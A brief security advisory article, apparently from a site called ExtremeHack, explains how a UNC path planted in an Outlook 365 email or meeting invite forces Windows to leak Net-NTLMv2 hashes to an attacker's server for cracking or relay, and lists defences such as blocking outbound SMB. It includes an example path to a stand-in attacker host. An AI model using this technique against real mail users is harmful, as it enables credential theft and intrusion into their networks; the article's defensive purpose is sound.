How Attackers Exploit Outlook 365 to Force Capture of NTLM Hashes

Security researchers have disclosed an attack technique targeting Microsoft Outlook 365 that forces the client to send Net‑NTLMv2 hashes to a remote server.

Core Attack Flow

Craft malicious request : The attacker sends a specially crafted email or meeting invitation.

Embed UNC path : A UNC path pointing to the attacker’s server (e.g., \\attackerIP\sharedfolder\image.jpg) is placed in the message metadata, attachment path, or an OLE object.

Automatic authentication trigger : When Outlook previews the mail or processes the reminder, it automatically attempts to access the UNC path.

Credential leakage : Windows SMB automatically sends the current user’s Net‑NTLMv2 hash for authentication.

Offline cracking or relay : The attacker captures the hash with tools such as Responder, then either cracks it offline or uses it for an NTLM relay attack to gain further internal access.

Risk Assessment

Low interaction : In some configurations the victim only needs to open the preview pane; no link click or attachment download is required.

High stealth : The authentication occurs at the system level, making it difficult for ordinary users to notice.

Potential impact : Obtained hashes can be used to compromise individual accounts or serve as a foothold for domain‑wide intrusion.

Technical Analysis: Why NTLM Remains Dangerous

Although Microsoft promotes more secure protocols such as Kerberos, NTLM persists for compatibility reasons across Windows environments.

Trigger medium : Outlook meeting reminders, embedded icons, or remotely loaded resources can initiate the attack.

Leaked content : The Net‑NTLMv2 packet contains username, domain and the encrypted challenge‑response.

Attack scenario : Targeted spear‑phishing against executives or operations personnel.

Defense and Mitigation Recommendations

Restrict outbound SMB : Block TCP port 445 outbound at the firewall to prevent credential leakage to the Internet.

Enforce NTLM policy controls : Use Group Policy to limit NTLM authentication or place users in the Protected Users group.

Strengthen patch management : Keep Office 365 and Windows up‑to‑date to address known remote‑resource loading vulnerabilities.

Monitor anomalous traffic : Deploy IDS/IPS to detect unusual SMB requests from internal hosts to external IPs.

ExtremeHack summary: The attack demonstrates that even mature office software can become a security weak point when its automation features are abused. Monitoring abnormal UNC path calls and tightening NTLM authentication are critical for defenders.